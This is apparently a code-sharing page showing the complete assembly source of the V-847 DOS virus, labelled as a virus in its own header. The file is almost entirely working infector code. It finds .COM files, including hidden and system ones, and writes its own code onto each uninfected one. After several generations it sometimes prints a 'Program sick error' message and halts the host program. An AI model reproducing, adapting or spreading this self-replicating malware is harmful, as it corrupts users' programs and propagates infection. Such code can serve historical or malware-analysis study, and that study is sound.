📄 c-847.asm
字号:
page ,132 name V847 title The V-847 virus .radix 16 code segment assume cs:code,ds:code org 100timer equ 6Colddta equ 80virlen equ offset endcode - offset startsmalcod equ offset endcode - offset transfbuffer equ offset endcode + 100newdta equ offset endcode + 10fname = newdta + 1Evirlenx = offset endcode - offset startnewid = offset ident + virlenx + 100start: jmp virusident dw 'VI'counter db 0allcom db '*.COM',0vleng dw 44F ;Unusedprogbeg dd 10000heof dw ?handle dw ?virus: mov ax,cs ;Move program code add ax,1000 ; 64K bytes forward mov es,ax inc [counter] mov si,offset start xor di,di mov cx,virlen rep movsb mov dx,newdta ;Set new Disk Transfer Address mov ah,1A ;Set DTA int 21 mov dx,offset allcom ;Search for '*.COM' files mov cx,110b ;Normal, Hidden or System mov ah,4E ;Find First file int 21 jc done ;Quit if none foundmainlp: mov dx,offset fname mov ax,3D02 ;Open file in Read/Write mode int 21 mov [handle],ax ;Save handle mov bx,ax push es pop ds mov dx,buffer mov cx,0FFFF ;Read all bytes mov ah,3F ;Read from handle int 21 ;Bytes read in AX add ax,buffer mov cs:[eof],ax ;Save pointer to the end of file db 3E ;Force DS: prefix cmp [newid],'VI' ;Infected? je close ;Go find next file xor cx,cx ;Go to file beginning mov dx,cx mov bx,cs:[handle] mov ax,4200 ;LSEEK from the beginning of the file int 21 jc close ;Leave this file if error occures mov dx,0 ;Write the whole code (virus+file) mov cx,cs:[eof] ; back onto the file mov bx,cs:[handle] mov ah,40 ;Write to handle int 21close: mov bx,cs:[handle] mov ah,3E ;Close the file int 21 push cs pop ds ;Restore DS mov ah,4F ;Find next matching file mov dx,newdta int 21 jc done ;Exit if all found jmp mainlp ;Otherwise loop againdone: mov dx,olddta ;Restore old Disk Transfer Address mov ah,1A ;Set DTA int 21 cmp [counter],5 ;If counter goes above 5, jb progok ; the program becomes "sick" mov ax,40 mov ds,ax ;Get the system timer value mov ax,word ptr ds:[timer] push cs pop ds ;Restore DS and ax,1 ;At random (if timer value is odd) jz progok ; display the funny message mov dx,offset message mov ah,9 ;Print string int 21 int 20 ;Terminate programmessage db 'Program sick error:Call doctor or ' db 'buy PIXEL for cure description',0A,0Dh,'$'progok: mov si,offset transf ;Move this part of code mov cx,smalcod ;Code length xor di,di ;Move to ES:0 rep movsb ;Do it xor di,di ;Clear DI mov word ptr cs:[progbeg],0 mov word ptr cs:[progbeg+2],es ;Point progbeg at program start jmp cs:[progbeg] ;Jump at program starttransf: push ds pop es mov si,buffer+100 cmp [counter],1 jne skip sub si,200skip: mov di,offset start mov cx,0FFFF ;Restore original program's code sub cx,si rep movsb mov word ptr cs:[start],offset start mov word ptr cs:[start+2],ds jmp dword ptr cs:[start] ;Jump to program startendcode label byte int 20 ;Dummy program int 20 ;??? dw 0 ;Unusedcode ends end start⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -